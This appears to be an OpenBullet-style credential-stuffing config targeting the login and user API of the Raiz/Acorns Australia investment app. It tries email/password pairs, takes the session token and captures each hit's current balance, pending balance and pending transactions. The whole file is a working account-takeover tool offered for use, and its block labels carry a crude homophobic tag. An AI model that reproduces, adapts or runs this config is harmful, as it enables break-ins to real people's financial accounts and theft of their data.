[SETTINGS]
{
  "Name": "Raiz",
  "SuggestedBots": 1,
  "LastModified": "2018-07-06T07:52:23.2661935+00:00",
  "AdditionalInfo": "",
  "Author": "Black Panther",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#HomoSexualPantherHASH FUNCTION Hash MD5 "<PASS>" -> VAR "HASH" 
#HomoSexualPantherPOST REQUEST POST "https://api-app.acornsau.com.au/v1/sessions" AutoRedirect=TRUE 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"udid\":\"<HASH>\"}" 
  CONTENTTYPE "application/json; charset=utf-8" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#HomoSexualPantherTOKING PARSE "<SOURCE>" LR "{\"token\":\"" "\"" Recursive=FALSE -> VAR "TOKEN" "" "" 
#HomoSexualPantherGET REQUEST GET "https://api-app.acornsau.com.au/v1/user" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Authorization: token <TOKEN>" 
#HomoSexualPantherCURRENT_BAL PARSE "<SOURCE>" LR "current_balance\":" "," Recursive=FALSE -> CAP "Current Balance" "" "" 
#HomoSexualPantherPENDING_BALANCE PARSE "<SOURCE>" LR ",\"pending_balance\":" "," Recursive=FALSE -> CAP "Pending Balance" "" "" 
#HomoSexualPantherPENDING_TRANSACTIONS PARSE "<SOURCE>" LR "pending_transactions\":" "," Recursive=FALSE -> CAP "Pending Transactions" "" "" 
#HomoSexualMINESWEEPER KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "email is invalid" 
    KEY "The email and password combination you entered is incorrect" 
  KEYCHAIN Success OR 
    KEY "token" 
    KEY "phone_number" 
